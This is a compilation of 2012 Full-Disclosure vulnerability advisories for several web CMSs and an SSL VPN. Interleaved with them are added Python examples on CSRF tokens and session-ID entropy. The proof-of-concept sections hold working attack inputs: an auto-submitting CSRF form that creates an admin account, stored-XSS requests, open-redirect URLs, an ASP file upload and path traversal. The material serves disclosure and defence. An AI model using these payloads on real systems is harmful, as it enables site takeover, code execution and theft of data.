/admin/modules/gateway/Protx/index.php  (module parameter)
/admin/modules/gateway/psiGate/index.php(folder parameter)
/admin/modules/gateway/psiGate/index.php(module parameter)
/admin/modules/gateway/SECPay/index.php (folder parameter)
/admin/modules/gateway/SECPay/index.php (module parameter)
/admin/modules/gateway/VelocityPay/index.php(folder parameter)
/admin/modules/gateway/VelocityPay/index.php(module parameter)
/admin/modules/gateway/Verisign/index.php   (folder parameter)
/admin/modules/gateway/Verisign/index.php   (module parameter)
/admin/modules/shipping/By_Percent/index.php(folder parameter)
/admin/modules/shipping/By_Percent/index.php(module parameter)
/admin/modules/shipping/By_Price/index.php  (folder parameter)
/admin/modules/shipping/By_Price/index.php  (module parameter)
/admin/modules/shipping/By_Weight/index.php (folder parameter)
/admin/modules/shipping/By_Weight/index.php (module parameter)
/admin/modules/shipping/Flat_Rate/index.php (folder parameter)
/admin/modules/shipping/Flat_Rate/index.php (module parameter)
/admin/modules/shipping/Free_Shipping/index.php (folder parameter)
/admin/modules/shipping/Free_Shipping/index.php (module parameter)
/admin/modules/shipping/Per_Category/index.php  (folder parameter)
/admin/modules/shipping/Per_Category/index.php  (module parameter)
/admin/modules/shipping/Per_Item/index.php  (folder parameter)
/admin/modules/shipping/Per_Item/index.php  (module parameter)
/admin/modules/shipping/Royal_Mail/index.php(folder parameter)
/admin/modules/shipping/Royal_Mail/index.php(module parameter)
/admin/products/extraCats.php   (add parameter)
/admin/products/extraCats.php   (name parameter)
/admin/products/index.php   (cat_id parameter)
/admin/products/index.php   (cat_name parameter)
/admin/products/index.php   (category parameter)
/admin/products/index.php   (name parameter)
/admin/products/index.php   (orderCol parameter)
/admin/products/index.php   (orderDir parameter)
/admin/products/index.php   (taxName parameter)
/admin/products/languages.php   (prod_master_id parameter)
/admin/products/options.php (attribute parameter)
/admin/products/options.php (name parameter)
/admin/settings/currency.php(active parameter)
/admin/settings/currency.php(name parameter)
/admin/settings/geo.php (iso parameter)
/admin/settings/geo.php (iso3 parameter)
/admin/settings/geo.php (name parameter)
/admin/settings/geo.php (numcode parameter)
/admin/settings/geo.php (printable_name parameter)
/admin/settings/tax.php (taxName parameter)
/cart.php?act=cart  (HTTP Referer)
/index.php  (add_1 parameter)
/index.php  (add_2 parameter)
/index.php  (county parameter)
/index.php  (firstName parameter)
/index.php  (lastName parameter)
/index.php  (mobile parameter)
/index.php  (town parameter)


6. SOLUTION

The CubeCart 3.0.x version family is no longer maintained by the vendor.
Upgrade to the currently supported CubeCart version - 5.x.


7. VENDOR

CubeCart Development Team
http://cubecart.com/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-02-10: CubeCart 3.0.x in End-of-Support/Maintenance cycle
2012-12-22: Vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bcubecart_3.0.20_3.0x%5D_xss
CubeCart Home Page: http://cubecart.com/


#yehg [2012-12-22]



[Full-disclosure] Open-Realty CMS 2.5.8 (2.x.x) <= Cross Site Request Forgery (CSRF) Vulnerability

2012-11-19 Thread YGN Ethical Hacker Group
1. OVERVIEW

Open-Realty 2.5.8 and lower versions are vulnerable to Cross Site
Request Forgery.


2. BACKGROUND

Open-Realty is the world's leading real estate listing marketing and
management CMS application, and has enjoyed being the real estate web
site software of choice for professional web site developers since
2002.


3. VULNERABILITY DESCRIPTION

Open-Realty 2.5.8 and lower versions contain a flaw that allows a
remote Cross-site Request Forgery (CSRF / XSRF) attack. The flaw
exists because the application does not require multiple steps or
explicit confirmation for sensitive transactions in the majority of
administrator functions, such as adding a new user or granting a user
administrative privileges. By using a crafted URL, an attacker may
trick the victim into visiting his web page to take advantage of the
trust relationship between the authenticated victim and the
application. Such an attack could trick the victim into executing
arbitrary commands in the context of their session with the
application, without further prompting or verification.


4. VERSIONS AFFECTED

<= 2.5.8 (2.x.x)


5. PROOF-OF-CONCEPT/EXPLOIT

<!-- Add Admin User -->
<form action="http://localhost/orealty/admin/index.php?action=user_manager" method="POST">
  <input type="hidden" name="action" value="createNewUser" />
  <input type="hidden" name="edit&#95;user&#95;name" value="user" />
  <input type="hidden" name="edit&#95;user&#95;pass" value="pa55w0rd" />
  <input type="hidden" name="edit&#95;user&#95;pass2" value="pa55w0rd" />
  <input type="hidden" name="user&#95;first&#95;name" value="hacker" />
  <input type="hidden" name="user&#95;last&#95;name" value="smith" />
  <input type="hidden" name="user&#95;email" value="hacker&#64;yehg&#46;net" />
  <input type="hidden" name="edit&#95;active" value="yes" />
  <input type="hidden" name="edit&#95;isAdmin" value="yes" />
  <input type="hidden" name="edit&#95;isAgent" value="yes" />
  <input type="hidden" name="limitListings" value="&#45;1" />
  <input type="hidden" name="edit&#95;limitFeaturedListings" value="&#45;1" />
  <input type="hidden" name="edit&#95;userRank" value="0" />
  <input type="hidden" name="edit&#95;canEditAllListings" value="yes" />
  <input type="hidden" name="edit&#95;canEditAllUsers" value="yes" />
  <input type="hidden" name="edit&#95;canEditSiteConfig" value="yes" />
  <input type="hidden" name="edit&#95;canEditMemberTemplate" value="yes" />
  <input type="hidden" name="edit&#95;canEditAgentTemplate" value="yes" />
  <input type="hidden" name="edit&#95;canEditPropertyClasses" value="yes" />
  <input type="hidden" name="edit&#95;canEditListingTemplate" value="yes" />
  <input type="hidden" name="edit&#95;canViewLogs" value="yes" />
  <input type="hidden" name="edit&#95;canModerate" value="yes" />
  <input type="hidden" name="edit&#95;canFeatureListings" value="yes" />
  <input type="hidden" name="edit&#95;canEditListingExpiration" value="yes" />
  <input type="hidden" name="edit&#95;canExportListings" value="no" />
  <input type="hidden" name="edit&#95;canPages" value="yes" />
  <input type="hidden" name="edit&#95;canVtour" value="yes" />
  <input type="hidden" name="edit&#95;canFiles" value="yes" />
  <input type="hidden" name="edit&#95;canUserFiles" value="yes" />
  <input type="hidden" name="edit&#95;canManageAddons" value="yes" />
  <script>document.forms[0].submit()</script>
</form>
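Both this PoC and the CubeCart "Add Admin User" / "Add Coupon" forms earlier on the page succeed for the same reason: the server accepts any POST carrying the victim's session cookie, and a cross-site form can supply every field except something derived from that session. The following is an added example in Python (not Open-Realty or CubeCart code) of the server-side gate that defeats both: a per-session HMAC token that the forged form cannot compute, checked with a constant-time compare, plus an Origin check. The secret, the site origin and the constructed POST body are assumptions.

```python
import hashlib
import hmac
import secrets
import time
from urllib.parse import parse_qs

# Per-deployment server secret; in practice loaded from configuration (assumption).
SECRET_KEY = secrets.token_bytes(32)
SITE_ORIGIN = "http://localhost"   # the application's own origin, as in the PoC forms


def issue_csrf_token(session_id, now=None):
    """Mint a token bound to the victim's session: <timestamp>.<HMAC(session:timestamp)>.
    A cross-site form cannot read the session cookie, so it cannot produce this value."""
    ts = int(time.time()) if now is None else int(now)
    mac = hmac.new(SECRET_KEY, f"{session_id}:{ts}".encode(), hashlib.sha256).hexdigest()
    return f"{ts}.{mac}"


def verify_csrf_token(token, session_id, now=None, max_age=3600):
    if not isinstance(token, str) or "." not in token:
        return False
    ts_str, mac = token.split(".", 1)
    if not ts_str.isdigit():
        return False
    ts = int(ts_str)
    current = time.time() if now is None else now
    if ts > current or current - ts > max_age:
        return False
    expected = hmac.new(SECRET_KEY, f"{session_id}:{ts}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, mac)   # constant-time comparison


def handle_admin_post(form, session_id, origin=None):
    """Gate for state-changing admin actions (create user, add coupon, ...).
    `form` is the parsed POST body; `origin` is the Origin header if the browser sent one.
    Returns (accepted, reason)."""
    if origin is not None and origin != SITE_ORIGIN:
        return False, "cross-origin request"
    token = form.get("csrf_token", [None])[0]
    if not verify_csrf_token(token, session_id):
        return False, "missing or invalid csrf token"
    return True, "ok"


# Constructed POST body with the fields of the CubeCart 'Add Admin User' PoC.
POC_BODY = ("name=hacker&adminUsername=hacker&email=hacker%40yehg.net"
            "&adminPassword=h%40ck3er&adminPassword_verify=h%40ck3er"
            "&isSuper=1&Submit=Add+User")

if __name__ == "__main__":
    victim_session = "f2c0bc69b813778a644b76c2b40c7ce0"
    forged = parse_qs(POC_BODY)
    print("forged request:", handle_admin_post(forged, victim_session, "http://attacker.example"))
    legit = dict(forged, csrf_token=[issue_csrf_token(victim_session)])
    print("legitimate request:", handle_admin_post(legit, victim_session, SITE_ORIGIN))
```

The Origin check alone is not sufficient (older browsers omit the header, and it is skipped here when absent), which is why the token check runs unconditionally.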


6. SOLUTION

The vendor has been reported to have discontinued this product and
therefore has no patch or upgrade that mitigates this problem.
It is recommended that an alternate software package be used in its place.


7. VENDOR

Transparent Technologies Inc.
http://www.transparent-support.com


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-03-05: Open-Realty 2.5.8 in End-of-Support/Maintenance cycle
2012-11-17: Vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bopen-realty_2.5.8_2.x%5D_csrf
Open-Realty Home Page: http://www.open-realty.org/


#yehg [2012-11-17]



[Full-disclosure] F5 FirePass SSL VPN 4xxx Series | Arbitrary URL Redirection

2012-10-21 Thread YGN Ethical Hacker Group
1. OVERVIEW

F5 FirePass SSL VPN is vulnerable to Open URL Redirection.


2. BACKGROUND

F5 FirePass SSL VPN provides secure remote access to enterprise
applications and data for users over any device or network while
protecting your corporate. (See
http://www.f5.com/pdf/products/firepass-overview.pdf)


3. VULNERABILITY DESCRIPTION

F5 FirePass SSL VPN contains a flaw that allows a remote cross site
redirection attack. This flaw exists because the application does not
validate the refreshURL parameter upon submission to the
my.activation.cns.php3 script. This could allow a user to create a
specially crafted URL, that if clicked, would redirect a victim from
the intended legitimate web site to an arbitrary web site of the
attacker's choosing.


4. VERSIONS AFFECTED

4xxx Series


5. PROOF-OF-CONCEPT/EXPLOIT

https://[VPN_HOST]/my.activation.cns.php3?langchar=&ui_translation=&refreshURL=http://yehg.net/


6. SOLUTION

We have not been informed of a fix.
We believe this issue should have been fixed by the time of releasing our advisory.


7. VENDOR

F5 Networks, Inc.


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-03-31: notified vendor
2012-04-04: vendor acknowledged
2012-10-20: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5BF5_firepass4x%5D_url_redirection
OWASP Top 10 2010 - A 10:
http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards
SANS Top 25 - Rank 23: http://cwe.mitre.org/top25/#CWE-601
CWE-601: http://cwe.mitre.org/data/definitions/601.html

#yehg [2012-10-20]




[Full-disclosure] SilverStripe CMS <= 2.4.7 | Arbitrary URL Redirection

2012-10-15 Thread YGN Ethical Hacker Group
1. OVERVIEW

SilverStripe 2.4.7 and lower versions are vulnerable to Open URL Redirection.


2. BACKGROUND

SilverStripe CMS is easy for both developers and content authors to
work with. The SilverStripe Framework keeps the code tucked away
neatly so that it can be accessed easily by programmers but does not
get in the way of content authors.


3. VULNERABILITY DESCRIPTION

SilverStripe CMS contains a flaw that allows a remote cross site
redirection attack. This flaw exists because the application does not
validate the BackURL parameter upon submission to the
/index.php/Security/login script. This could allow a user to create
a specially crafted URL, that if clicked, would redirect a victim from
the intended legitimate web site to an arbitrary web site of the
attacker's choosing.


4. VERSIONS AFFECTED

Tested on 2.4.7


5. PROOF-OF-CONCEPT/EXPLOIT

http://localhost/index.php/Security/login?BackURL=//yehg.net


6. SOLUTION

Upgrade to the latest 3.x version.


7. VENDOR

SilverStripe Development Team
http://www.silverstripe.org/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-02-06: notified vendor
2012-10-15: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5BSilverStripe_2.4.7%5D_url_redirection

#yehg [2012-10-15]



[Full-disclosure] SilverStripe CMS <= 2.4.7 | Persistent Cross Site Scripting Vulnerability

2012-10-15 Thread YGN Ethical Hacker Group
1. OVERVIEW

SilverStripe 2.4.7 and lower versions are vulnerable to Persistent
Cross Site Scripting.


2. BACKGROUND

SilverStripe CMS is easy for both developers and content authors to
work with. The SilverStripe Framework keeps the code tucked away
neatly so that it can be accessed easily by programmers but does not
get in the way of content authors.


3. VULNERABILITY DESCRIPTION

The Title parameter is not properly sanitized upon submission to the
/index.php/admin/security/EditForm/field/Roles/AddForm and
/index.php/admin/RootForm URLs, which allows an attacker to conduct
Cross Site Scripting attacks. This may allow an attacker to submit a
specially crafted request whose stored script code is executed in a
victim's browser.


4. VERSIONS AFFECTED

Tested on 2.4.7


5. PROOF-OF-CONCEPT/EXPLOIT


POST /index.php/admin/security/EditForm/field/Roles/AddForm?SecurityID=[ID]
HTTP/1.1
Host: localhost
Referer: 
http://localhost/index.php/admin/security/EditForm/field/Roles/add?SecurityID=[ID]
Cookie: PHPSESSID=1e4ea938f83b04bc826231987cedc050;
Content-Type: application/x-www-form-urlencoded
Content-Length: 146

Title=%27%22%3E%3Cscript%3Ealert%28%2Fxss%2F%29%3C%2Fscript%3E&ctf%5BClassName%5D=PermissionRole&SecurityID=[ID]&action_saveComplexTableField=Save


POST /index.php/admin/RootForm HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.4.0_rc3
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Referer: http://localhost/index.php/admin/
Content-Length: 256
Cookie: PHPSESSID=25c8f4060c398d05732fe494eb3ad4f1;
Pragma: no-cache
Cache-Control: no-cache

Title='%22%3E%3Cscript%3Ealert(%2Fxss1%2F)%3C%2Fscript%3E&Tagline=test&CanViewType=Anyone&ViewerGroups=&CanEditType=LoggedInUsers&EditorGroups=&CanCreateTopLevelType=LoggedInUsers&CreateTopLevelGroups=&SecurityID=[ID]&Theme=&ajax=0&action_save_siteconfig=1



6. SOLUTION

Upgrade to the latest 3.x version.


7. VENDOR

SilverStripe Development Team
http://www.silverstripe.org/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-02-06: notified vendor
2012-10-15: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5BSilverStripe_2.4.7%5D_xss


#yehg [2012-10-15]



[Full-disclosure] ocPortal CMS 8.x | Session Hijacking Vulnerability

2012-08-20 Thread YGN Ethical Hacker Group
1. OVERVIEW

ocPortal CMS 8.x and lower versions are vulnerable to a Session Hijacking
flaw which could allow attackers to compromise administrator sessions.


2. PRODUCT DESCRIPTION

ocPortal is the website Content Management System (a CMS) for building
and maintaining a dynamic website. ocPortal's powerful feature-set
means there's always a way to accomplish your vision. Not only does
ocPortal's CMS have all the features you'd expect: for instance photo
galleries, news, file downloads and community forums/chats, but it
does so whilst meeting the highest accessibility and professional
standards. It is also smart enough to go beyond page management, to
automatically handle search engine optimisation, and provide
aggressive hack attack prevention.


3. VULNERABILITY DESCRIPTION

ocPortal CMS generates 7-digit session IDs for logged-in users, so a
valid session ID can be found by brute force. Successful hijacking
requires the "Enforce IP addresses for sessions" option to be
disabled. However, when a user's IP address changes frequently, this
option is likely to be disabled because it would invalidate logged-in
sessions. Alternatively, if a user and an attacker happen to be within
the same subnet, the attack would succeed regardless of the Enforce IP
setting being turned on.


4. VERSIONS AFFECTED

Tested on version 8.1.2


5. PROOF-OF-CONCEPT/EXPLOIT

sample session cookie: ocp_session=8711789
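A 7-digit numeric ID gives at most 10^7 possibilities, about 23 bits, and the attacker does not need a particular session: any live one will do, so the expected work drops with the number of logged-in users. The following is an added example in Python (not ocPortal code) that extracts the ID from a cookie header like the sample above, computes the search space and expected attempts for a given number of live sessions, simulates sequential guessing against a constructed set of live IDs, and shows what a properly sized session ID looks like. The request rate and session counts used are assumptions.

```python
import math
import secrets


def session_id_from_cookie(cookie_header, name="ocp_session"):
    """Pull the named cookie value out of a Cookie header string."""
    for item in cookie_header.split(";"):
        key, _, value = item.strip().partition("=")
        if key == name:
            return value
    return None


def id_search_space(sample_id):
    """Size of the space a purely numeric, fixed-width ID is drawn from."""
    if not sample_id.isdigit():
        raise ValueError("expected an all-digit session id")
    return 10 ** len(sample_id)


def entropy_bits(space):
    return math.log2(space)


def expected_attempts(space, active_sessions):
    """Mean guesses until the first valid ID when guessing without repetition:
    the expected position of the first of k marked items among n is (n + 1) / (k + 1)."""
    if active_sessions < 1:
        raise ValueError("need at least one live session to hijack")
    return (space + 1) / (active_sessions + 1)


def hours_to_hijack(space, active_sessions, requests_per_second):
    return expected_attempts(space, active_sessions) / requests_per_second / 3600


def brute_force(valid_ids, width):
    """Simulated sequential guessing against a constructed set of live IDs.
    Returns the number of requests needed to land on one of them."""
    for guess in range(10 ** width):
        if f"{guess:0{width}d}" in valid_ids:
            return guess + 1
    return None


def generate_session_id():
    """What the fix looks like: 32 random bytes (256 bits) from the OS CSPRNG."""
    return secrets.token_hex(32)


if __name__ == "__main__":
    sid = session_id_from_cookie("ocp_session=8711789")      # the advisory's sample
    space = id_search_space(sid)
    print(f"space={space:,} ({entropy_bits(space):.1f} bits)")
    for live in (1, 10, 100):                                  # assumed live-session counts
        print(f"{live:>3} live sessions at 100 req/s: ~{hours_to_hijack(space, live, 100):.2f} h")
    print("secure id:", generate_session_id(), f"({entropy_bits(2 ** 256):.0f} bits)")
```

With one live session and 100 requests per second the mean time to a hit is under 14 hours; with a hundred live sessions it is minutes. The IP enforcement option raises the bar only for attackers outside the victim's address, which is the point the advisory makes about shared subnets.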


6. SOLUTION

No fix is available as of 2012-08-19.
The workaround is to enable the option "Enforce IP addresses for
sessions".


7. VENDOR

ocPortal Development Team
http://www.ocportal.com/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-07-29: notified vendor; vendor did not plan to release a fix
because of the workaround deployed by default
2012-08-19: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/2wire/%5Bocportal_8x%5D_session_hijacking_vulnerability


#yehg [2012-08-19]


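The advisory's point is that a 7-digit ID leaves too small a keyspace for an online guessing run. As an added example (not part of the advisory or of ocPortal's code), the block below quantifies that, shows what a CSPRNG session ID looks like instead, and runs a simple detector over a constructed log format (timestamp, client IP, method, path, ocp_session value, status) that flags clients presenting many distinct session values; the log format and the `203.0.113.5` / `198.51.100.7` addresses are assumptions.

```python
import math
import re
import secrets
from collections import defaultdict

# Session-ID format described in the advisory: 7 decimal digits (e.g. 8711789).
OCP_SESSION_DIGITS = 7


def keyspace_bits(n_digits: int) -> float:
    """Entropy in bits of a uniformly random n-digit decimal session ID."""
    return n_digits * math.log2(10)


def expected_guesses(n_digits: int, live_sessions: int = 1) -> float:
    """Average guesses (without repeats) before the first hit when
    `live_sessions` valid IDs are spread uniformly over the n-digit space:
    (N + 1) / (k + 1) for N = 10**n_digits and k live sessions."""
    return (10 ** n_digits + 1) / (live_sessions + 1)


def hours_to_first_hit(n_digits: int, requests_per_second: float,
                       live_sessions: int = 1) -> float:
    """Wall-clock estimate for an online guessing run at a fixed request rate."""
    return expected_guesses(n_digits, live_sessions) / requests_per_second / 3600


def generate_session_id(n_bytes: int = 16) -> str:
    """What a session ID should look like instead: 128 bits from the OS CSPRNG."""
    return secrets.token_hex(n_bytes)


# --- Detection side ------------------------------------------------------
# Constructed log format (an assumption, not ocPortal's own logging):
#   <timestamp> <client-ip> <method> <path> ocp_session=<id> status=<code>
LOG_LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<ip>\S+) (?P<method>\S+) (?P<path>\S+) "
    r"ocp_session=(?P<sid>\d+) status=(?P<status>\d{3})$"
)


def detect_session_guessing(log_lines, threshold: int = 20):
    """Return client IPs that presented at least `threshold` distinct
    ocp_session values.  A real browser reuses one cookie value; a
    guessing run burns through many."""
    distinct_ids = defaultdict(set)
    for line in log_lines:
        m = LOG_LINE_RE.match(line)
        if not m:
            continue  # unparsable line: skip rather than crash the monitor
        distinct_ids[m["ip"]].add(m["sid"])
    return sorted(ip for ip, sids in distinct_ids.items() if len(sids) >= threshold)


# Constructed sample: one source cycling through 25 candidate IDs, and one
# legitimate client reusing the advisory's sample cookie value.
SAMPLE_LOG = [
    f"2012-08-19T10:00:{i:02d} 203.0.113.5 GET /index.php ocp_session={8711700 + i} status=302"
    for i in range(25)
] + [
    "2012-08-19T10:01:00 198.51.100.7 GET /index.php ocp_session=8711789 status=200",
    "2012-08-19T10:01:05 198.51.100.7 GET /index.php?page=cms ocp_session=8711789 status=200",
]

if __name__ == "__main__":
    print(f"7-digit ID: {keyspace_bits(OCP_SESSION_DIGITS):.1f} bits; "
          f"{generate_session_id()} has {16 * 8} bits")
    print(f"expected guesses for one live session: {expected_guesses(OCP_SESSION_DIGITS):,.0f}")
    print(f"at 100 req/s that is about {hours_to_first_hit(OCP_SESSION_DIGITS, 100):.1f} hours")
    print("guessing sources:", detect_session_guessing(SAMPLE_LOG))
```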

[Full-disclosure] ocPortal 7.1.5 <= | Open URL Redirection Vulnerability

2012-07-28 Thread YGN Ethical Hacker Group
1. OVERVIEW

ocPortal CMS 7.1.5 and lower versions are vulnerable to Open URL Redirection.


2. BACKGROUND

ocPortal is the website Content Management System (a CMS) for building
and maintaining a dynamic website. ocPortal's powerful feature-set
means there's always a way to accomplish your vision. Not only does
ocPortal's CMS have all the features you'd expect: for instance photo
galleries, news, file downloads and community forums/chats, but it
does so whilst meeting the highest accessibility and professional
standards. It is also smart enough to go beyond page management, to
automatically handle search engine optimisation, and provide
aggressive hack attack prevention.


3. VULNERABILITY DESCRIPTION

ocPortal CMS 7.1.5 and lower versions contain a flaw that allows a
remote cross site redirection attack. This flaw exists because the
application does not properly sanitise the redirect parameter. This
allows an attacker to create a specially crafted URL that, if clicked,
would redirect a victim from the intended legitimate web site to an
arbitrary web site of the attacker's choice.


4. VERSIONS AFFECTED

Tested on 7.1.5


5. PROOF-OF-CONCEPT/EXPLOIT

http://localhost/ocportal/index.php?page=login&type=misc&redirect=http://attacker.in


6. SOLUTION

Upgrade to the latest version.


7. VENDOR

ocPortal Development Team
http://www.ocportal.com/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-03-06: notified vendor
2012-03-21: patched version,7.1.6, released
2012-07-29: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bocportal_7x%5D_open_url_redirection


#yehg [2012-07-29]



[Full-disclosure] Acuity CMS 2.6.x <= Arbitrary File Upload

2012-05-20 Thread YGN Ethical Hacker Group
1. OVERVIEW

Acuity CMS 2.6.x (ASP-based) versions are vulnerable to Arbitrary File Upload.


2. BACKGROUND

Acuity CMS is a powerful but simple, extremely easy to use, low
priced, easy to deploy content management system. It is a leader in
its price and feature class.


3. VULNERABILITY DESCRIPTION

Acuity CMS 2.6.x (ASP-based) versions contain a flaw that may allow an
attacker to upload .asp/.aspx files without restriction, which will
execute ASP(.NET) code. The issue is due to the script
/admin/file_manager/file_upload_submit.asp not properly sanitizing the
'file1', 'file2', 'file3', ..., 'fileX' parameters.


4. VERSIONS AFFECTED

Tested with version 2.6.2.


5. PROOF-OF-CONCEPT/EXPLOIT

[REQUEST]
POST /admin/file_manager/file_upload_submit.asp HTTP/1.1
Host: localhost
Cookie: ASPSESSIONID=XXX

-6dc3a236402e2
Content-Disposition: form-data; name=path

/images
-6dc3a236402e2
Content-Disposition: form-data; name=rootpath

/
-6dc3a236402e2
Content-Disposition: form-data; name=rootdisplay

http://localhost/
-6dc3a236402e2
Content-Disposition: form-data; name=status

confirmed
-6dc3a236402e2
Content-Disposition: form-data; name=action

fileUpload
-6dc3a236402e2
Content-Disposition: form-data; name=file1; filename=0wned.asp
Content-Type: application/octet-stream

<% response.write("0wned!") %>

-6dc3a236402e2--

[/REQUEST]


6. SOLUTION

Acuity CMS is no longer in active development.
It is recommended to use another CMS in active development and support.


7. VENDOR

The Collective
http://www.thecollective.com.au/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-05-20: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bacuity_cms2.6%20x_(asp)%5D_arbitrary_fileupload

#yehg [2012-05-20]



[Full-disclosure] Acuity CMS 2.6.x <= Path Traversal Arbitrary File Access

2012-05-20 Thread YGN Ethical Hacker Group
1. OVERVIEW

Acuity CMS 2.6.x (ASP-based) versions are vulnerable to Path Traversal.


2. BACKGROUND

Acuity CMS is a powerful but simple, extremely easy to use, low
priced, easy to deploy content management system. It is a leader in
its price and feature class.


3. VULNERABILITY DESCRIPTION

The issue is due to the script, /admin/file_manager/browse.asp, not
properly sanitizing user input, specifically directory traversal style
attacks (e.g., ../../) supplied via the 'path' parameter. It would
allow the attacker to access arbitrary files outside of web root
directory.


4. VERSIONS AFFECTED

Tested with version 2.6.2.


5. PROOF-OF-CONCEPT/EXPLOIT

http://localhost/admin/file_manager/browse.asp?field=form&path=../../


6. SOLUTION

Acuity CMS is no longer in active development.
It is recommended to use another CMS in active development and support.


7. VENDOR

The Collective
http://www.thecollective.com.au/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-05-20: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bacuity_cms2.6%20x_(asp)%5D_path_traversal

#yehg [2012-05-20]



[Full-disclosure] FastPath Webchat | Multiple Cross Site Scripting Vulnerabilities

2012-04-16 Thread YGN Ethical Hacker Group
1. OVERVIEW

Fastpath WebChat is vulnerable to Cross Site Scripting.


2. BACKGROUND

Fastpath WebChat is part of the Fastpath product. It provides a way
for users to begin chatting with support agents using Fastpath.
Fastpath is a plugin of OpenFire, a real time collaboration (RTC)
server for instant messaging.  Fastpath provides queuing and routing
for instant messaging to intelligently link people together.


3. VULNERABILITY DESCRIPTION

Multiple parameters were not properly sanitized, which allows an
attacker to conduct a Cross Site Scripting attack. This may allow an
attacker to create a specially crafted URL that would execute arbitrary
script code in a victim's browser.


4. VERSIONS AFFECTED

4.0.0 (released date: Aug 5, 2008)


5. VULNERABLE PARAMETERS

File: webapp/agentinfo.jsp
Parameters: agentName, emailValue, jid, nameValue, title

File: webapp/chat-ended.jsp
Parameter: workgroup

File: webapp/chatmain.jsp
Parameters: chatID, workgroup

File: webapp/chatroom.jsp
Parameters: email, jid, userNickname, question

File: webapp/contact-agent.jsp
Parameter: email

File: webapp/email/leave-a-message.jsp
Parameter: workgroup

File: webapp/email/offline-mail.jsp
Parameter: workgroup

File: webapp/queue_updater.jsp
Parameters: chatID, workgroup

File: webapp/style.jsp
Parameter: workgroup

File: webapp/transcriptmain.jsp
Parameters: chatID, workgroup

File: webapp/transcriptsrc.jsp
Parameters: from, text


6. SOLUTION

Fastpath WebChat is no longer in active development.
Ref: http://www.igniterealtime.org/projects/openfire/plugins.jsp
Ref: http://fisheye.igniterealtime.org/browse/svn-org/openfire/trunk/src/plugins/fastpath/src/web


7. VENDOR

Jive Software
http://www.jivesoftware.com/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-04-15: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bfastpath-webchat%5D_multiple_cross_site_scripting
What XSS Can Do: http://yehg.net/lab/pr0js/view.php/What%20XSS%20Can%20Do.pdf
XSS FAQs: http://www.cgisecurity.com/articles/xss-faq.shtml
XSS (wiki): http://en.wikipedia.org/wiki/Cross-site_scripting
XSS (owasp): http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
OWASP Top 10: http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
CWE-79: http://cwe.mitre.org/data/definitions/79.html


#yehg [2012-04-15]

-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd



[Full-disclosure] Joomla! Plugin - Beatz 1.x <= Multiple Cross Site Scripting Vulnerabilities

2012-04-16 Thread YGN Ethical Hacker Group
1. OVERVIEW

Beatz 1.x versions are vulnerable to Cross Site Scripting.


2. BACKGROUND

Beatz is a set of powerful Social Networking Script Joomla! 1.5
plugins that allow you to start your own favourite artist band
website. Although it is just a Joomla! plugin, it comes with the full
Joomla! bundle for ease of use and installation.


3. VULNERABILITY DESCRIPTION

Multiple parameters were not properly sanitized upon submission, which
allows an attacker to conduct a Cross Site Scripting attack. This may
allow an attacker to create a specially crafted URL that would execute
arbitrary script code in a victim's browser. The vulnerable plugins
include com_find, com_charts and com_videos.


4. VERSIONS AFFECTED

Tested in 1.x versions


5. PROOF-OF-CONCEPT/EXPLOIT

== Generic Joomla! 1.5 Double Encoding XSS

http://localhost/beatz/?option=com_content&view=frontpage&limitstart=5%2522%253e%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2f%2558%2553%2553%2f%2529%253c%2f%2573%2563%2572%2569%2570%2574%253e=1

== com_charts (parameter: do)

